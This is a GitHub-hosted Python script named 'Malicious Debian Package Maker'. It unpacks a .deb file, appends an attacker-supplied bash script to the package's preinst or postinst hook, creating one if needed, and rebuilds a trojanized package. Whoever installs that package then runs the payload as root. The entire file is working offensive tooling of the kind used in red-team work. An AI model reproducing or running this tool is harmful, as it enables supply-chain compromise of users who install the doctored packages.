-
Notifications
You must be signed in to change notification settings - Fork 2
/
main.py
133 lines (91 loc) · 2.98 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/python3
'''
Tool Name :: Malicious Debian Package Maker
Author :: Padsala Tushal
Date :: 24 Oct 2021
'''
import os
import argparse
import sys
from colorama import Fore, Style
def get_arguments():
parser = argparse.ArgumentParser(description='Inject bash script in debian package',usage=f'python3 {sys.argv[0]} -p debian_package -s bash_script',epilog=f'EXAMPLE - python3 {sys.argv[0]} -p /tmp/file.deb -s /tmp/script.sh')
parser.add_argument('-v','--version',action='version',version='1.4',help='show the version of program')
parser.add_argument('-s',metavar='bash script',dest='bash',help='Enter your bash script path')
parser.add_argument('-p',metavar='debian package',dest='deb',help='Enter your debian package path')
args = parser.parse_args()
if len(sys.argv) <= 4:
parser.print_usage()
sys.exit()
return args
args = get_arguments()
deb = args.deb
bash = args.bash
if ".deb" not in deb:
sys.stderr.write("Enter vaild debian file")
sys.exit()
if ".sh" not in bash:
sys.stderr.write("Enter vaild bash file")
sys.exit()
if not os.path.exists(deb) or not os.path.exists(bash):
sys.stderr.write("File Doesn't Exists")
sys.exit()
def extract(file):
cmd = f"dpkg-deb -R {file} /tmp/{file.split('.deb')[0]} > /tmp/log.txt"
os.system(cmd)
debpath = f"/tmp/{deb.split('.deb')[0]}"
injectablefile = ""
def checkforinjectablefile():
global debpath,injectablefile
postinst = debpath+"/DEBIAN/postinst"
preinst = debpath+"/DEBIAN/preinst"
if os.path.exists(postinst) or os.path.exists(preinst):
if os.path.exists(preinst):
injectablefile = preinst
else:
injectablefile = postinst
else:
file = open(preinst,'w+')
file.close()
os.chmod(preinst,0o755)
injectablefile = preinst
def read_content(script: str):
file = open(script, 'r')
content = file.read()
file.close()
return content
payload = read_content(bash)
def embed(script: str, payload: str):
file = open(script,'a')
file.write(payload)
file.close()
def build():
global debpath
malicious = os.getcwd()+"/malicious"
if not os.path.exists(malicious):
os.mkdir("malicious")
build_cmd = f"dpkg-deb -b {debpath} {malicious} > /tmp/log.txt"
os.system(build_cmd)
def clean():
cmd = f"rm -rf {debpath} && rm /tmp/log.txt"
os.system(cmd)
def color_print(string: str , color: str, bold=False):
colors = {'red': Fore.RED,'blue': Fore.BLUE,
'green': Fore.GREEN,'yellow': Fore.YELLOW}
if bold:
print(Style.BRIGHT+colors[color]+string+Style.RESET_ALL)
else:
print(colors[color]+string+Style.RESET_ALL)
def main():
color_print(f'[+]Extracting File from {deb} Package','yellow',True)
extract(deb)
color_print(f'[+]Checking for Injectable script','red',True)
checkforinjectablefile()
color_print(f'[+]Injecting bash scipt','green',True)
embed(injectablefile,payload)
color_print(f'[+]Building Malicious Package','blue',True)
build()
color_print(f'[+]Cleaning Up','red',True)
clean()
color_print(f'[+]Successfully created Malicious Package','green',True)
main()